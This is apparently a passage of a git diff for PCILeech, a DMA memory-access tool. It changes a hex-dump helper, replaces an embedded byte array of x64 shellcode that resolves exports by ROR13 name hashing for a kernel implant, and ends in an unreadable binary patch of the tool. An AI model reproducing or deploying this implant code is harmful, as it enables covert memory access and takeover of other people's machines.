-	0x00, 0x00, 0xb8, 0xde, 0x24, 0xe6, 0xf7, 0x48, 0x89, 0x85, 0xa8, 0x00,
-	0x00, 0x00, 0x48, 0x8d, 0x82, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
-	0xb0, 0x00, 0x00, 0x00, 0x8b, 0x53, 0x08, 0x48, 0x8b, 0xce, 0xe8, 0x29,
-	0x00, 0x00, 0x00, 0x48, 0x8b, 0x0b, 0x48, 0x8d, 0x5b, 0x10, 0x48, 0x89,
-	0x01, 0x48, 0x83, 0xef, 0x01, 0x75, 0xe5, 0x4c, 0x8d, 0x9c, 0x24, 0xc0,
-	0x01, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49,
-	0x8b, 0x7b, 0x20, 0x49, 0x8b, 0xe3, 0x5d, 0xc3, 0x48, 0x8b, 0xc4, 0x48,
-	0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18, 0x48,
-	0x89, 0x78, 0x20, 0x8b, 0xea, 0x48, 0x85, 0xc9, 0x74, 0x7a, 0xb8, 0x4d,
-	0x5a, 0x00, 0x00, 0x66, 0x39, 0x01, 0x75, 0x70, 0x48, 0x63, 0x41, 0x3c,
-	0x48, 0x03, 0xc1, 0x74, 0x67, 0x81, 0x38, 0x50, 0x45, 0x00, 0x00, 0x75,
-	0x5f, 0x8b, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xd1, 0x74, 0x54,
-	0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74, 0x4b, 0x8b, 0x42, 0x20,
-	0x85, 0xc0, 0x74, 0x44, 0x8b, 0x72, 0x24, 0x4c, 0x8d, 0x0c, 0x01, 0x8b,
-	0x7a, 0x1c, 0x48, 0x03, 0xf1, 0x48, 0x03, 0xf9, 0x45, 0x33, 0xc0, 0x45,
-	0x85, 0xdb, 0x74, 0x2c, 0x45, 0x8b, 0x11, 0x4c, 0x03, 0xd1, 0x33, 0xdb,
-	0xeb, 0x0b, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc2, 0xc1, 0xcb, 0x0d, 0x03,
-	0xd8, 0x41, 0x8a, 0x02, 0x84, 0xc0, 0x75, 0xee, 0x3b, 0xdd, 0x74, 0x23,
-	0x41, 0xff, 0xc0, 0x49, 0x83, 0xc1, 0x04, 0x45, 0x3b, 0xc3, 0x72, 0xd4,
-	0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08, 0x48, 0x8b, 0x6c, 0x24, 0x10,
-	0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b, 0x7c, 0x24, 0x20, 0xc3, 0x46,
-	0x0f, 0xb7, 0x04, 0x46, 0x44, 0x3b, 0x42, 0x14, 0x73, 0xde, 0x42, 0x8b,
-	0x04, 0x87, 0x48, 0x03, 0xc1, 0xeb, 0xd7, 0x00
+	0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c,
+	0x89, 0x70, 0x20, 0x55, 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0x90,
+	0x00, 0x00, 0x00, 0x4c, 0x8b, 0xf1, 0xc7, 0x45, 0xe7, 0x4a, 0x45, 0x3b,
+	0xd7, 0xc7, 0x45, 0xeb, 0x62, 0xe0, 0x07, 0x37, 0x48, 0x8d, 0xba, 0xc8,
+	0x00, 0x00, 0x00, 0xc7, 0x45, 0xef, 0x1f, 0x9d, 0x48, 0x9d, 0x48, 0x8d,
+	0x75, 0x4b, 0xc7, 0x45, 0xf3, 0xa1, 0x7b, 0xcc, 0xdc, 0xbb, 0x19, 0x00,
+	0x00, 0x00, 0xc7, 0x45, 0xf7, 0x92, 0x6d, 0x58, 0x58, 0xc7, 0x45, 0xfb,
+	0xce, 0xad, 0x90, 0x4d, 0xc7, 0x45, 0xff, 0x57, 0x63, 0x32, 0x5a, 0xc7,
+	0x45, 0x03, 0x8f, 0xb5, 0x6a, 0x6a, 0xc7, 0x45, 0x07, 0xf9, 0xbe, 0xdd,
+	0x05, 0xc7, 0x45, 0x0b, 0xf7, 0x38, 0xb3, 0x9d, 0xc7, 0x45, 0x0f, 0xc9,
+	0xc5, 0x6e, 0x6c, 0xc7, 0x45, 0x13, 0x89, 0x83, 0x6c, 0xeb, 0xc7, 0x45,
+	0x17, 0x9b, 0x97, 0x64, 0xcf, 0xc7, 0x45, 0x1b, 0x2a, 0xc0, 0xb2, 0xa8,
+	0xc7, 0x45, 0x1f, 0x3d, 0x28, 0xc3, 0x7c, 0xc7, 0x45, 0x23, 0x2a, 0xd0,
+	0x35, 0x30, 0xc7, 0x45, 0x27, 0xdb, 0x4f, 0x3d, 0xc5, 0xc7, 0x45, 0x2b,
+	0x61, 0x4c, 0x04, 0x5d, 0xc7, 0x45, 0x2f, 0x9d, 0x8f, 0xa0, 0xc3, 0xc7,
+	0x45, 0x33, 0xb8, 0xd4, 0x29, 0x88, 0xc7, 0x45, 0x37, 0x50, 0x64, 0xb0,
+	0x6f, 0xc7, 0x45, 0x3b, 0xe2, 0xca, 0x61, 0xe6, 0xc7, 0x45, 0x3f, 0xde,
+	0x24, 0xe6, 0xf7, 0xc7, 0x45, 0x43, 0x16, 0x35, 0xfd, 0x87, 0xc7, 0x45,
+	0x47, 0x36, 0x31, 0x0e, 0x68, 0x48, 0x8d, 0x76, 0xfc, 0x49, 0x8b, 0xce,
+	0x8b, 0x16, 0x48, 0x8d, 0x7f, 0xf8, 0xe8, 0x25, 0x00, 0x00, 0x00, 0x48,
+	0x89, 0x07, 0x83, 0xc3, 0xff, 0x75, 0xe6, 0x4c, 0x8d, 0x9c, 0x24, 0x90,
+	0x00, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49,
+	0x8b, 0x7b, 0x20, 0x4d, 0x8b, 0x73, 0x28, 0x49, 0x8b, 0xe3, 0x5d, 0xc3,
+	0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+	0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x8b, 0xea, 0x48, 0x85, 0xc9,
+	0x74, 0x7a, 0xb8, 0x4d, 0x5a, 0x00, 0x00, 0x66, 0x39, 0x01, 0x75, 0x70,
+	0x48, 0x63, 0x41, 0x3c, 0x48, 0x03, 0xc1, 0x74, 0x67, 0x81, 0x38, 0x50,
+	0x45, 0x00, 0x00, 0x75, 0x5f, 0x8b, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48,
+	0x03, 0xd1, 0x74, 0x54, 0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74,
+	0x4b, 0x8b, 0x42, 0x20, 0x85, 0xc0, 0x74, 0x44, 0x8b, 0x72, 0x24, 0x4c,
+	0x8d, 0x0c, 0x01, 0x8b, 0x7a, 0x1c, 0x48, 0x03, 0xf1, 0x48, 0x03, 0xf9,
+	0x45, 0x33, 0xc0, 0x45, 0x85, 0xdb, 0x74, 0x2c, 0x45, 0x8b, 0x11, 0x4c,
+	0x03, 0xd1, 0x33, 0xdb, 0xeb, 0x0b, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc2,
+	0xc1, 0xcb, 0x0d, 0x03, 0xd8, 0x41, 0x8a, 0x02, 0x84, 0xc0, 0x75, 0xee,
+	0x3b, 0xdd, 0x74, 0x23, 0x41, 0xff, 0xc0, 0x49, 0x83, 0xc1, 0x04, 0x45,
+	0x3b, 0xc3, 0x72, 0xd4, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08, 0x48,
+	0x8b, 0x6c, 0x24, 0x10, 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b, 0x7c,
+	0x24, 0x20, 0xc3, 0x46, 0x0f, 0xb7, 0x04, 0x46, 0x44, 0x3b, 0x42, 0x14,
+	0x73, 0xde, 0x42, 0x8b, 0x04, 0x87, 0x48, 0x03, 0xc1, 0xeb, 0xd7, 0x00
 };
 
 const BYTE LINUX_X64_VFS_KSH[] = {
diff --git a/pcileech/tlp.c b/pcileech/tlp.c
index 8258597..f573ccd 100644
--- a/pcileech/tlp.c
+++ b/pcileech/tlp.c
@@ -107,7 +107,7 @@ VOID TLP_Print(_In_ PBYTE pbTlp, _In_ DWORD cbTlp, _In_ BOOL isTx)
 		);
 	}
 	printf("\n");
-	Util_PrintHexAscii(pbTlp, cbTlp);
+	Util_PrintHexAscii(pbTlp, cbTlp, 0);
 }
 
 BOOL TLP_CallbackMRd(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMRd, _In_ PBYTE pb, _In_ DWORD cb, _In_opt_ HANDLE hEventCompleted)
diff --git a/pcileech/util.c b/pcileech/util.c
index bf80b9b..f110612 100644
--- a/pcileech/util.c
+++ b/pcileech/util.c
@@ -664,14 +664,15 @@ VOID Util_WaitForPowerCycle(_Inout_ PPCILEECH_CONTEXT ctx)
 	Util_WaitForPowerOn(ctx);
 }
 
-VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb)
+VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb, _In_ DWORD cbInitialOffset)
 {
 	DWORD i, j;
-	if(cb > 8192) {
-		printf("Large output. Only displaying first 8192 bytes.\n");
-		cb = 8192;
+	if(cb > 0x10000) {
+		printf("Large output. Only displaying first 65kB.\n");
+		cb = 0x10000 - cbInitialOffset;
 	}
-	for(i = 0; i < cb + ((cb % 16) ? (16 - cb % 16) : 0); i++)
+	cb += cbInitialOffset;
+	for(i = cbInitialOffset; i < cb + ((cb % 16) ? (16 - cb % 16) : 0); i++)
 	{
 		// address
 		if(0 == i % 16) {
diff --git a/pcileech/util.h b/pcileech/util.h
index 4187ac2..24acc29 100644
--- a/pcileech/util.h
+++ b/pcileech/util.h
@@ -221,7 +221,8 @@ VOID Util_WaitForPowerOn(_Inout_ PPCILEECH_CONTEXT ctx);
 * Print a maximum of 8192 bytes of binary data as hexascii on the screen.
 * -- pb
 * -- cb
+* -- cbInitialOffset = offset, must be max 0x1000 and multiple of 0x10.
 */
-VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb);
+VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb, _In_ DWORD cbInitialOffset);
 
 #endif /* __UTIL_H__ */
diff --git a/pcileech_files/pcileech b/pcileech_files/pcileech
index f616eef93e12404ba47729611bebbc713601ba64..a97a2193e5f38404ba25100ed3c4a589943d57f3 100644
GIT binary patch
delta 41637
zcmbS!33yD`8~438s|Z;nL=wp)5<(;rdk_)~gCMrri&|=56SSohBAAY;aH<#8mhOwT
zY3-`S*3hbkYKx+wmKo6s)i#uw@Asa2@8l-!zu)(K^E@-}Ilp%~`+K%KGey^H6)yKH
z3~O4{NZ_vwg$UWtN@_?DGK3C7Eqq1`QER)d&79IgVQEwl3|v&ir#Ie#ofUpy=U9$w
zw9tn~g)J;d3=2wEgi6yDq0)5LQG7BcGDv}I(urP*?nJg%91!!rQmF7yq$*f5X;j<p
z!#=VfJ~B4E-^ok9^&18sY&dr7C=%#~x0cschYX_NnNgdt9(ea+d!_c`m+Y?8Ky1lk
zJQ|2^@Xt2<vp&c3`R97J)T5>ND$Dc<<MA%^$trxq!~iZUa5RR0e$J5vY_4YmaUu`<
z(I+eP3KQ3G^b0O`nDg%P&zCvAf`{$=^8^0*A(x!S!$0!R!5q2F!*B8M2_9a<f{?d?
z-YvxkJidzaMpIbM?jU)xIFArymWtYoe=gu+Z?MyzVLbE%WkDX-9-=v(A#8(pnD`sd
z)m8drb6~v)m=9a)6~<1WuKwV-uSb|Tfefzm4fC?0J!9Evv7R`c+ia$0f>Iqyi1}+s
z1PTp>E!|_$09CKc91j<YYT##7yr#Szs=-2Sp{QY%4GOh~e2@_Cw(qO5H-iQX0UpA&
zM(mAReYcB#!#vo?I&o%Ekc5X|2I8H9_xy%aYYBpv@C#2^5OTvQ?jhVkoL(Y$ebJ#v
zo?i8)POT#dzQW(Cd;=c$5xmg(Nam%rFJqW^Q_?&x^SGxFuEfo10+KrcZ2)OGFN)&n
z2w~~~)9^VeZm5BOURTL!N)0^Y2n_>4=uize3&Lqt!BmYQ2;)?R>>Bt@ReoFzJmZ*>
zz?2&JV^w}p4cu@7@<?CEtHEdxpp>An2441?lE8)<c(N-0UJX3vYel}O2Hs1RF9uHO
zqxF<mhN^J9hQc^i;am+o<CKy>Sq=OdRlcGIUUpWIudKp(`ohbqg0JcywG0(kDhh!$
z@FG>-Py;`EL6J|Wfge-lJJi6-E};L@E29SEf~t^R124X$$Pcf9-%;hK)WEk$N>k3M
zfqMlic%Hci<H$87fmJndgQ~Eh241GhZ>fQIQss+k;CVL``+HQ}tX1_Bs>1Oa3PQP}
z;M*;h*OVr&#S?1ahocnv4mI!+6*pDK&B95QF}ylMIHTfIYT)Nod{GVjXBA&n1HY-_
z8*1QpIFA1JUJb?{s=}Tc_}?miyaw(St(5p&4ZN<3+iT$URlJgL>i=4m#;Ocobq>(*
zWEBsqfp=B$gc^8174J|3AFbjh9nQz!bd@n&$Dqbuq~cR*;EPqfw5!r5XdR?wmh{f)
zaCN0cuu!JMn{Y(&KZ0Gy=&UgKXN3+=*Wuc1Nb97YIy@{x$q=o*ltxjQ1|2Tx<P$Q?
zRSL9P(q1V#1y2nG?V!WeMH=U3=y0kH?Pb#8>VlB7vNfFQAM>mGHC$r=@pGe?jC6Qy
z9X>^e`|I#IIvn$}`?W}i*9FSkpSXECMu1yf5LW4MZO$ilp$-qy$#2l%!8&}44zE{*
zn}zpujF2jZP^7~{b@(0~USEe7>+l9T{J0Je)8VBYNBOB;^sA_II)!kZLYWSa(BXC+
z9;w4Cbhx@!;oM3c9__AwVr5o!MgtdBK74g}j1CXf;fkih4AbF_b@B!s9;f0w{RAB&
zUZ;?v!<*{x4mvzRhiB;UW;)!Y!<*~y?95oD{L}=AI>vCFLJJ)}PKPJy@F_YxS%=Tj
z;VpIeA~%loY1ON}^4ttTNYy~lRXV(t4lmT<t#$YY9o|NVZ_(jx3D?^HJsqQ+PN7JL
zx7Xo&ba)3HUaZ5@bog-{-cg5}OLdG+I>tF2-bII(>F};P+^)kjba;gh&(z_j{M)`J
ztCu;xNvvQhD9({wrKbF&zDL|5uC}efa>cj7XFzlYLKL4ud`FoJulVK^CpYgX<?&dG
zlY4g*^LRML$*Vhxcs!Wm<joyhc-#+h^AvL9jzSJdBtY)lk;mf?;}NI6>6pXg_b5&i
zonsu2-=a8qZ$~zdU!^#CZAS)=U!XX7Yex!?pP@K;X@`NwzlulypF-~05y*kVBtUN2
zA@KM<ijy~XR5$^|e@1cg!j3W?|A6A;eI2Dd{szU#>pF^gd=tgV+d7JPd>zHf$vU?1
z_zUrv|E7?4brf=783~YAb>#8*vlJ(9>X^gh^C(VU)G?07r%{}orz4xkpQ1Q9O-BZg
zkEA#`OGgTi5283ZNr!>Q`<Mx!HG(6M1KlW2-qIoPct?syQ@r9a)j%tX8z^4J<IO2f
zPSH`y<FOPcXXq&A@o<Wh6Lb{ucreAu`8l@mxY>^Ya(a$J4oDQI#fc-2#~;QaPR`FU
zhsW<xoSdFx9FO0kI5|5<HjiJWI5{~-29IB$IQce53Xh+mIQcY(f#T-)uLvM#<_P2h
zhbc}@%pvgjK8lm`a#TFxeSqTRvm9kS{sG0wS2;>~{0)kek8%|A_$G>zZ*mmz_&SP{
zPjYNQ-0X^ffdFzwjzTW5jN;^j9C<wcEXB$9IOg#9Jc^Ugag5{fX%r`4<H+XmrzlQ7
z#*x9}BPmX<#gW3}ePUyU$%Tm1%Pge++S_vaNt5NODgRnU_K+-_S2)&gCR?31T>?n@
zFmy*(s52&3xE~PRgF}1KMng?DuTMcuX_Y3+^_+(AC1)T*uB6TwSJ~v`fav8sg)v9S
zdsM|?@)^>zwWZF?o{VZFZH!?{qT-FIhzq$bP5J4wVF@X~uD{8e{%qq|!CnV-Z#UuN
zORrjx6Ul5ICGh)^$vj^qKE^Sb)rk%lpJNHp&3sc)T$9yUDHn%{^~ED>PILs$o>oWC
zjF|e+<+2zb<u7?8<oN6%E9I>Y(zv#-VIhXD!O^5?F;<vtcw0*B(GS@q!>+)mp=Poc
zoWsZ<)XoxP;>B)kU`(UHxCg*&1!XF0J$pW;vuI+U$1FDgR0&porRRcvChM4DWau0z
zA0yP3{fNiKQj_H}p#eY(igOzSEjHOqUc}w!2_I{+d}*?L%lUiA<(9Vq%T6k{DP@bX
z%#^>ROb94=7FDFNM6mX-U9o+|(@bjIBmClDoQDQ0u@{jVDu=?Jm26z&xl+(y?7POz
z&4sXU`C>6I$xd=RCd>LML~I3loP-XJiWT<K7=yCO^26_@w@Zw6%2hsB6BqjNI(009
zD?N}6hkh^vO#3dXKFeX$AU9_T)IwJ3Ho2;jxjVF~I3;;|XiCAW3Nw{t_@bE97Tl6m
zD9O8xd4#f1g_%n7jsqk?#|v=sCC1xirhK;5c-wTS%+q8WQ(+R%nUZJ@Gg$+vK5hQT
z$T^V}UUKoc37NC}K(!Qr+Cw&zC<PWB-=NtX=vjj;g_Oa3R6zO4eB*5~f648T1=gx;
zSo8L<vGJj1#a=1w1?&pM;Q66aKuG9tIOmBfVWqS*<M7;s9IKWYQZ`wY#;^vPY%d)3
z6a;<u*mvLMqMSIM!7NwZf-Zdwz0pXV$`t-5FH<9Z4lb%S$ql9c!%$T@U?)tqbLNkK
z+9}i9ahNd=SI<#3L*M_UWax!|F?3CDXzPF5c}ca?t)?9_`iNa`XvBXT8l)QP^ZP$b
zR-v~O^xt*@RXb+sUku&X8#;lN%YW3+*MBNCwC^6zP^!MkG&_2%Qg3^vpOG8SFBa1Z
zXlQFgbl-m`I!aCSPbKs1+1$i>19T0ib;fY&OxNv{Ll4ItEXn?(AkIIOg1n^I>_9fN
z|Ch~tZnL|uWA%R<-J%*z{eLlPP>cpTn*F!YZmQ8!N|pb2PQSQG#p)jB_|o@3i*LWL
z6o0y6bUqbdKRByZ=}2xgpZr)=+nTK0vF)Std{a9A4CoHupgBX+(yKxRx!OX~b0qwC
zeg+{w{?vTm+~pmsTg?oC_2msr32w)26{eoCV_k14EG7G&V}<@7&HdZ&N_od|^8p2j
z>dI1*7e)(yykG*o(}HOaUXMMW=-o!wCv0s$R?SSg!*hxChE`m~1o?hPOCL5nF|@kk
zOjR-Ze<;%I;<({Wij%6Pn4&8F@EfHVQ1BTtS~FF?yV(fFe^kJ|drAd#L7QOy$fWum
zp-ah9!e>i6wVA$>Ern;PdXxU!I#aEmQHqyN)`wNIZhuh2@MKHjIkJ2VAODf>4yxs8
z+;Tv{UV-YUk<PZQZ7o%1#jjMhoD@pEbv230ca_pV!6kC5wHwXZ^l~&}vl8o%)ahx1
z0Fzvw1pN#b1v8FInD+i7<73q%m#GccR-}wa>CB@`pEyUiY#2f5E|-U}AenMLvAW0x
zO~i7z+-sj8c<P!TgR28yHfX&NgHi$1=@}mJOJ&(p!pCBMiYm_fC5N>bj1pA!C6n#n
zjbU|#Ue4Ag8~Q6bQ&uCVEe~nDrXzdQFZ0m}c@J`2Md&~3#dSw%il|?iE4kqiU14?A
z{Xz!vsju;@a@2V3|F-;+YPpCxlf%dS55xO0()5Ne--6*+0scpp6IH|AZYyK(6W#}t
z|0RX+eYAc*K;4Nd=L&KSZ*1Td*d!(X-#jd>po&p2eWn^xrp{Gs*^)d@3_(DG;~+l&
zXKs<|C}?A;F9j5Ahqzv{i?*QTYdAPMEd4sS40v&M4Y_|4OEXWU-uZ7u2)7QUMeFyl
zg8sB#sh6)zSRCdbMiRjR2hQ}cJ%!yxiT&EoR5OQrPdIAIFE*JhLyq`5uKq{r`>?K|
zUD}*ql^Pv16osSy_VIrx!E|l4WGnw4#9Est{{NH=N$5-V__D5KgLuiXc9l^5o%mWO
zVA<1{YjwlTn#TttoH6eoPBU@C(04r5ok|Y6o5|uHvb5{53RuXavqDMTF?#Whm}%)z
z+AxjE96ja;Z9z?zC3e35qNRGFFP}58v7i{AwN2K3h}ANs9X18@JZ!Qo#T@MqCYK4=
zl~>H-TXl{MB)zo53*at^5$LwKF3_7TY1PJ8L)hL{(Y3POu`8`YYGtEP+!}MXYF208
z3$Uc_^E$IOt=q(jG&BgIolS}T9`CbDDutW?P44GgY<26n)E(Ddt^)=%qvFTLlAr~8
z`4G;nk9~Y-Id*lIA;oLLF^yem9b)#!bYU^x&tGz1$Te`kWdD3fRUYo6G8OR_@cwE(
zl&a0I49Fd%<;+${n;Vl2C84eFkM_j#SaBHdgU`3Ub&wl<8pG5y%v7dAcOu8RqveIw
z5)pIKY9t$+)3gRsFDKNE*pW~4`{f%^6K;_2`6|U+f2D-2k$U+g;y&r_DfyMbx%CKg
zJEdj)AeB+WM!np+96`264*=ib<|_%S&7w5c2{y28XoqWXTAEIGY|ymojzya+bD&L<
zuBlB7qq#W6QY!o-_FCJ9Vlms(HrgD3(&*Ltk=pTJs?_K(Oi?pwscAz14lXxHOaJ#x
z@Qd3pFx=Tzs>Y*A<lb8lu~ZW=BbHxTt4e0V7RXGlCc{PiszhGe3X$&r6!EMQ>GvK)
z4F44IsuF2VB9F}&vNba7T_v+63^Md6Lk$t1Dv`GvLS*+pMSQD7dWJ*frGJV9K*X$$
z$Tb;|nfp(f+Bv~B()O=1{4>>6=YJ{%VNg<c1BZ|7bA2Ee@=v*t+#oZzj^5F`KV-08
zs#(;~s^t2iS2|ApQ>1>C$SFMD<oNKPB7s#R)2=~el_pZVsxQ@H9XrGhxpYHa#Mpnj
z;&PSuL{EMQ$li!z9ct7?-P~|3|96)o>$da|?33(w%OLBISTx0cDPu()!p1ATu})4i
zw+))j;l;x=6R#*H4p4Hhz=S5qcQ+JKj(_fBo1>{5$Ke^R1q6GaUsz$cSk^afLWlu&
z>G(57H2{ZiV29Hzo@vHM^Voono23;$vtK(#iD}Hg)4O5{+tF#7<ogLTbZ#e=e$0k<
zZXx}8iLK}yFFp4$`>69NDX)wzNl%ncTx1`lM~KJSm+3?B8PVlEpZuR)F01hoOU`P<
zZg!a;lAudkoof=<tgZv4&X?Jtu8XC&F0if{jig(b*pnFv5h;qaHjl+s<u`?G&FB!(
zp*laRir<0V&q$8QsLqe9;%Bh*%yuCrH8%~a7$&wdGto?2z5Gfshnxpx)5<r0XbYNo
zxL3~zCbvX~qE&pjoBz=GE#%)cJgQ8#ZOR3xx>CEPOFf@ubGnU{LY`r#yA4BAH0$1?
z;bK>eV4^cvoc3Cc71j(-Y(vwG_JwR#_e?L#y~&oL?6d9@8m+(Na-C3S`TW}{e5SVy
zJ!d(tNTl?bD1}^NFZW3DzJ8IGN^I$rNOrwPoTm-b5gX96nKaJHp6%IEYUyMj_H2Sj
z84Hb#L<jrW*jYO86T59(Ek?0tdZviKvJZMTm5x1PpBOtyn=Y`xUgtu)|IK$;Xp90n
z1?RPQjXmzwMCx;f#hbQC7ay?iOm9i;9&CT6cam7&>nt4wKEiS2BPn2o6*(yPvP*1#
zpV!3BY*gRyv=};owi?SU*w-5?_tG8D0q(8f6}-T+4n14Npd}7XthaFn$^x?*M4ncU
zlK0Xm*oUDZ9Pq>k$?RfR`X)%Pf6r=XMT)aoLRPvsmQBuTCQUhw&Nx`gyv^!oG?hxf
z;eE3H>6bmlaAxZFgjmU5?-$nWNgPQ|&Nn(e19lsoX~vTaKQ-Bg-llfhTWy8kj+OOm
z?8$J>C%@<+hOxjAo~&{IAn^)o+drPl*ng~ek$v7jTs*{n=${~NV6Og&;tZBJAR_i#
zoRi`dI378sE%^m~dI2jtp?(#cc>_EfS9Mxj`p{Ag`N|X6BH&by{LW+oZnAH)6C;BV
z9YE2~i2o_^wO)LU{Wc)Wr!g`6pJ18U>7flM><2;auR2of(Q(#qYQs2va*YTtJq~kB
zNv<;i2amJT>|~$z6n^12%q2B-p>wGB8CXr&(pwX+CltB)1>Yjp0Wns#Kcurd>S!F2
zXm1krC($^>CQ-~;Qnd`2O*bL7^f)qcqlCRbu(x=C{XVdL!xhMpwcsrJ)gilds4NWK
z$W~B69X)eU2kFdl_S~S>QspUDG^h<4;QFBCdh1BTc(zL1c%Q`$?kM#<#l{Uzlp3C5
zw!s6XxKpfbaG2EdEB0{ks8;*2m~>Yo9lO#(j4A_NHlFrm6wg;GC+{2N(SxlV(m2eH
zoj+GYcf5l<9n9z!AlM(2u){+-nL}Wc)Qh18cTJU$MyfeSQ3*H+S6vUCse(=ONgrYl
z1^eHa!-?6Uidl6WrAp%-g0=y8iG+;C(A|q3hPCu6zRXt=EXj+65RE2H%@*py8Vm;w
z+@C5^CR=C$&d~t!*~SgVV;BHTVCRNLO7UN^KZhnr-<L4M6B%uuIYul#$W0c$Q^3kU
zBam)fk`7X?>?=uvo67K|0lck*z4SyAY4$O;|A`pPIG3Mj8m4qhTKCz~i@w(8>Zl{E
z(XeFc)M3_dSfn)W7@Iz<(eS&di~LGgju%{R`9PD^E2A9l)pBTG10<#_PHgEDVZ;6-
zBq4+(zd4M$H$XN-mBpo_TQ-|yKRn9HhP6)!h9Gv>UOCMnyz`b~7*l{-*q4N}j<T-9
z(^5YzreRTu{faBco9|k%&iCs3FIwBbg4Wd|?ET?wA|5#utMnk8mfbw!vm>l>cv|%E
zL%h1E7Q<-1r_GlVK|v~xvg{ENb-z>k1HWA>Im(_HVG41eZI>?DPY>!XP_MdvVBe20
zNK@CbzeaR=%CQvbS%=cxSB%NXD$t-hR1L8E#tSYyuT~u`0}9x3s@9j)rK_peI%Q$D
zkuAjeY~RSWeSbVaHFGY1$vJ^)=A0{+YG&@uf7a*G5|rE*Mdllw@>pC*id0<Vacf3O
znz3>odwJBf)L3rsV*Zkg+}=f3ZanPmzwu9d0c3A*F-slYQaZe!JvBN#qO~g4NLS(a
zzl7LV2id;Sk%N&K=44TEGHO_>3hLJiQ>leoZonR<ge}=3wT~^N0Oo0Mm6^oDtl5}B
z(#03qk}<s_{I4sy?4V1&;uw;D^8mXtCdv!Tw}55L^T{uyKNvgmWD9Bj=iBc-IbReT
zu}R~4f&Egz%k0x}&r7ZMvefa-r9alOG2`Q;D|@!*k1rC%{;bV}=3-+ucEUPo?yl{>
zPe>G{xLw-~lQKo=$__SRa)S6LTRr)6>F@2^dq3Sm6#dzPDV_Uo*-69JSW(^?S*}#3
zSt@{gGx@P{oU9&3v^f}vb&mb3?P}jdSNs%*9?I@?$j)_B`-<&Y*3|H>bf%1<Ps3;Y
zd8Ob`ba(UuoO9YMKT|aw{jrxikO97O1kig2OWjhB?U@>$PAABdVMsfAm|T)aP>0#b
zF0I`HcJp|^?ot)7=26m?ACR*;EMQuU_%TbJ)=A3S&Srsh-_Aaq)--`Gt*E?~Y+qGP
zai`dVy8R-#Q}%FLc<29%_dJB7;(vJ0>58LFVcF9|%+-Bp1SV1Pp>V@$+VHkE#RYe$
z2Hxe52Nd#kuu@uUo^HBWh+4NF{s?tQ?z}vru-vDx+_SJ;EaY}k0S%C~Jp%h>dZe_y
zh>0`i``_5D`P3aBvAh}0;y-l*W>``(1b<^S1uBCab(|5#PR)oj<4LYStVJu!=h{O*
z#;`sFVZ|TWvZuJi)(qcxmk)|2mRi1ARpqm+sA-%PVruX$_ftC2>`&BAL=KMliai6L
zHk#qgs??NDrWR7uR{B}<5)6E*T)OV_2)1$N5K(5o&Fmhu3suK^t1`<>C}Q1aH4a*Z
z=~#!hEMg00wU&B*!akhUxxw>0wOZ)$Ayz$BrPV9hw=<)}DXh`#6#p={#N`jzh}n(B
zciEEJ1ErXcS?TPK()Ev+|D0IK|6`UiC*80A4ip!)UHl<iIHz?+;`_W<=g>KEOqoE(
zO15+-4r-M_G6QS}eccCza?9A-da6eHeaLRjnJCU;1Lhi1o_A~Qe-B!*HMF?p7u+%%
z-ea%N?IpHnH|M@8E@lPuS{hDMUTC|KzobIQiByuL+RhWmRvJ4yuUJfA>*qh&>|v3X
z!w&CYl8jJWBaA1Kj&-Jz{fKv1WKKlXYj3;Tj?d-4D~0A0(arbS(46U#Wdl2$Gu%W+
zFj$VcuPKh9B*>ET97(Rf`m}^&xKg&`=m>3)G^mL@Qklteit6_I+w7^_l-TV`vZ%K?
z25UcT9EO%bXip{|0VG$8?Z_<-uHA)K@16q~=DcYhvK0%u`k$p({*po=VEJ)&dO@o6
z>pRSIp+Q{4;unr=vlPn{+K(Lxc&RvGSFy!-yWFqZkUCBYtViW2`6{tn-eE-x&9%FK
zgmKt^D;g-2bzEc|GoRwlEr`?27dBEGekL8P<F&KKJ?dHGt1r=>@o4^%qe3nY4%~uX
z{7jP9{A3tYYJN1OFrQsqlpOI1WmVOql~OjPIDt}Z&f=eGDNbTTpDB~-Y-R1AZ5DME
zIImGJI<eZ9jY@Dk_ZzRX=bsIizIvT)dUj^SXGf}=wSEY*lV5|`Bo_NzYUgHY?&7#>
zHWZjXE2Buqn{>XR7PX~6OTZtmvNg}WE_$+-izCF(Sl`7F(u%EY%HsY>y|8wId#6&!
zA3$>dW~k=Fp;`MCBiH9JPapx_2kO4YE-!B8x9wfnMN34z&VrV-O>PM-rGhSz>V0bC
zs+yz$h$p~QmCs*;N<Fr6Nsvz?O04V^_WF{Tv@eidv^!s-JKhJr?G=oG1v)df>;x>A
zc!N|xKuNFNX7*r7&y=p1AP@Q>S^Kq3yr$8*CH70N^YA$epH{;BdgR#aZ1(dFCF3jG
zUwD4JDAr-O&3(mntV3Q@$Y_+h#7G4Ic@zfX=*Xt!#fr_CEib~1M<g(i9_1H%TWIlN
zhlj-#$Z~8<IESz32&7~DJ-viM!dRg@9qtD#Kd)%w9M<s}1$Clyk`z#YV>LHw^OsCE
